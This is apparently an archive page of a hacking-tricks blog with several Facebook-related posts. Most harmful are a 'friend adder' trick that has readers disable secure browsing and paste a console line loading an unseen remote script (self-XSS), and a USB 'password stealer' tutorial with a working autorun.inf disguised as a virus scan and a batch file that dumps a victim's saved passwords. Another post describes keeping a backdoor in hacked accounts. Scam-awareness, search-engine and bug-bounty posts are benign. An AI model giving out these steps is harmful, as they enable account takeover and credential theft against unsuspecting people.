Showing posts with label Facebook. Show all posts
Showing posts with label Facebook. Show all posts

Add All Your Friends To A Facebook Group At Once!



It can be pretty tedious if you open a new group on Facebook and invite all your friends one by one to join the group. So, to ease your task i have got some pretty click trick whereby you will simply perform two to three steps and all of your friends will be added to the Facebook group at once!
For this to work, you need to disable secure browsing for a while. You can again enable secure browsing once you complete doing this.


To disable secure browsing, go to Account Settings .


> Security > Secure Browsing.



Remove the tick mark and click on Save changes.




For Google Chrome

Go to your Group where you want to invite/add all of your friends.
Right click and press on Inspect Element.
Select Console.
Paste the following on Console :



document.body.appendChild(document.createElement('script')).src='http://goo.gl/7Q26z';




For Mozilla FireFox

Go to your Group where you want to invite/add all of your friends.
Press Ctrl+Shift+K
A new area will pop down from the address bar.
Paste the following code there :



document.body.appendChild(document.createElement('script')).src='http://goo.gl/7Q26z';


its done..


Have Fun.. :-)



How do Facebook ‘Like’ scams reach thousands of users?



If you look, you will find countless Facebook pages that have hundreds of thousands of likes and comments. But are these real? Some of the posts invite people to write a comment to see what happens. But predictably, nothing happens and this is all part of a large-scale Facebook scam.

These ‘stories’ then appear on news feeds and begin to resemble spam. The most common modus operandi for such Facebook scams is to attract people by getting their sympathy. This is easily achieved with images of sick children, wounded animals or details about some charitable organization.

How the scam functions
A page is created with a sympathetic message or an amusing anecdote to attract attention. The post is then shared publicly and people are called to perform actions like ‘like the page’, ‘comment’ or ‘share the page’. The next step posts the page on similar nefarious groups and spreads to hundreds of thousands of people via their newsfeed.


Once a page has garnered thousands of likes/comments, it is put up for sale. Someone who wishes to acquire the exposure of the page can purchase it and potentially misuse it. Certain details of the page can also be modified for malicious purposes. In this manner, anyone can get their hands on pages with high edge ranks to spam thousands of people, even though they may have the best anti-spam software. Such scams can spread propaganda, increase likes/comments, market something or even fool people into giving money or information.

Edge Rank and how it can be misused
The reason why parties resort to this trick is the money that can be gained via the ‘Facebook Like algorithm’. As a post gets increased comments/likes, its visibility rises. This page is then displayed to a greater number of people and this is beneficial to marketers in the short term and the long term.

This algorithm devised by Facebook functions on a platform known as Edge Rank. This is simply the score of a page based on various parameters and this score determines how useful the page actually is. In turn, this decides how many people will view the page. A higher edge rank allows a page to be displayed to more people in their newsfeed. Various factors that come into play here are affinity (closeness with the person), weight (embedded video or a link) and the time decay (relevance).


Unfortunately, there are many parties out there that misuse this platform. A high edge rank can be used to enhance brand exposure but it can also be used to bombard Facebook users with random messages and promotions that they are not interested in. Scammers also use this method to reach as many people as possible. All this has led to a process known as ‘Like buying’. This refers to the sale of Facebook fan pages and a simple Google search validates this.

Awareness about this technique and other Facebook scams is useful. ‘Like buying’ is quite a common occurrence and it can be misused in several ways. We recommend that you do not fall for manipulative messages or images that ask you for comments or likes.

Facebook Web Search Coming Soon?



The web is all about the queries and the results. For all those who like to spend most of the time on internet, surfing and searching Google, you might get a new search enginesoon. Whether or not you like Google, you were supposed to use it to make queries and get a pile of results but not now as it seems like competition in search engines is now growing and we now might see a new competitor soon.

Recently, Mark Zuckerberg, the founder of famous social website Facebook indicated that the users might see a new web search engine developed by them. According to him, people are already using the Facebook search feature to find the social details of others and they are handling lots of queries daily. He also added saying that, they have a team of people working on developing the so called Facebook Search Engine, and at some point they will do it.


According to him, there is something that Google and current search engines are missing. Instead of producing a pile of results, they should correctly and aptly answer a query just by proving a specific answer to a specific query made.

So if we are to see this new Facebook SE, we should expect some major change how the search engines have been working till now. It won’t be wrong either to expect a major difference between Google and Facebook SEs. At least there is one thing that is clear, with all the info Facebook already has, they should not find it difficult to establish than any other new startup.

We will have to wait and see what the company plans about this initiative but users are sure to get benefitted. Well there could be a new era of internet with the advent of Facebook web search, who knows it could be Facebook Ads next. [Via]

HOW TO MAKE YOUR OWN USB STEALER | STEAL PASSWORD USING PENDRIVE

We Do use Pendrive/Usb Storage Device for different purpose but i am really interested in hacking friends password using USB Storage device :D ...Sounds different but yes it is possible i found a way to perform it ...

As we all know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Also you know know that there are many tools to recover Saved passwords,so in this article i will explain you on How to made a USB passwords stealer and steal saved passwords form remote Computer.

Before proceeding Download These Required Material


MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:


Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc


IE Passview: IE passview is a small program that helps us view stored passwords in Internet explorer.


Password fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.

ChromePass - ChromePass is a small program used to vied stored password in Google Chrome.
Now Downloaded All the required things come to some real stuff
Mediafire password : doyouknow1247.blogspot.in



Note:Kindly disable your antivirus before performing these steps


Steps to create Own Usb Stealer1.First of all download all tools and copy the executables (.exe( files in your USB i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe, ChromePass.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.


3. Create another Notepad and write the following text onto it.


start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
Start  chromepass.exe /stext ChromePass.txt 


save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your USB Password stealer is ready all you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the black screen window will appear.
After this you can see saved password in .TXT files

I Hope this tutorial help you in hacking remote pc stored password ..keep visiting keep learning, Keep commenting :)


Have a Good Day..!!!

Adding Facebook BACKDOOR in Hacked Account...!!!







Here is a way how some hackers retain the hacked facebook accounts even after the target changes the password or the hacker himself returns it to the target.
Many of the facebook users are unaware that there is a alternative way to log in the facebook account by linking a alternate email account to it. Not the default email id which you use regularly to log in by typing the email id and password but a different email id. So when you are logged in this alternate email id and open the facebook website it directly logs in your facebook account without even asking the password. If you did not get the concept here is a example. Imagine that your regular email id is "regular@gmail.com" and you add a alternate email id "alternate@gmail.com" in account setting. Now when you are logged in "alternate@gmail.com"
and open facebook website it redirects you and directly opens your facebook account. So here the is procedure how you can add this alternate email id as a backdoor.


For Any help Leave a comment..

Thanks..!!

Free Antivirus For 6 Months From Facebook | Facebook Antivirus 2012

Free Antivirus For 6 Months From Facebook By ALLTRICKSWORLD.IN

Facebook is concerned with the security of its users and wants to make their experience on Facebook more secure. To achieve this Facebook is providing license for 6 months for 5 major antivirus applications. A user can select any one antivirus from McAfee Antivirus for 6 months, NortonAntivirus for 6 months, Trend Micro Internet Security for 6 months, Microsoft Security Essential (It’s free), and SophosAntivirus for Mac.



download free antivirus from Facebook screenshot 650x523 Free Antivirus For 6 Months From Facebook


Just go to Facebook‘s Antivirus Marketplace Page and choose your antivirus and get it free for 6 months. After the 6 month’s period create a new Facebook ID

Facebook Said - Please Hack us & Get $500 Reward...!!!









Earlier through Hackers Cup, Facebook has already shown honour to hackers now social networking giant Facebook is directly encouraging hackers to try hacking its security systems to find weaknesses. Those who succeed will receive a reward of US$500 or more and have their name added to a list of helpful hackers.



The hackers have taken part in Facebook's White Hat program. Anyone who finds a way of breaching the site's networks, and owns up, can earn rewards worth thousands of dollars. As well as money, Facebook promises not to land them in trouble with the police & legal harassment if they have complied with the program's golden rules. Already one British hacker has earned more than $2400 from Facebook, and the most prolific White Hat contributors are now given their own Facebook "bug bounty" credit cards. Facebook's chief security officer,
Joe Sullivan, says he would much rather the hackers worked with the company, rather than against it. In time, he hopes the hackers will be able to find legitimate ways of expressing themselves within schools and universities. "There is a real lack of practical academic programs for cyber-security not only in the US but also internationally," he said. "Cyber-security is a skill best learned by doing, and unfortunately many of the current academic programs place little emphasis on real-world practical experience such as that gained in competition or via bug-bounty programs.



According to Facebook - "If you're a security researcher, please review our responsible disclosure policy before reporting any vulnerabilities. If you give us a reasonable time to respond to your report before making any information public and make a good faith effort to avoid privacy violations, destruction of data and interruption or degradation of our service during your research, we will not bring any lawsuit against you or ask law enforcement to investigate you."



Eligibility:-

To qualify for a bounty, you must:
Adhere to our Responsible Disclosure Policy:
Be the first person to responsibly disclose the bug
Report a bug that could compromise the integrity of Facebook user data, or circumvent the privacy protections of Facebook user data, such as:
Cross-Site Scripting (XSS)
Cross-Site Request Forgery (CSRF/XSRF)
Remote Code Injection
Broken Authentication (including Facebook OAuth bugs)
Circumvention of our Platform permission model
A bug that allows the viewing of private user data
Reside in a country not under any current U.S. Sanctions (e.g., North Korea, Libya, Cuba, etc.)


Rewards:-

A typical bounty is $500 USD
We may increase the reward for specific bugs
Only 1 bounty per security bug will be awarded
Exclusions:-
The following bugs aren't eligible for a bounty (and we don't recommend testing for these):
Security bugs in third-party applications (e.g., http://apps.facebook.com/[app_name])
Security bugs in third-party websites that integrate with Facebook
Security bugs in Facebook's corporate infrastructure
Denial of Service Vulnerabilities
Spam or Social Engineering technique


For more detailed information click Here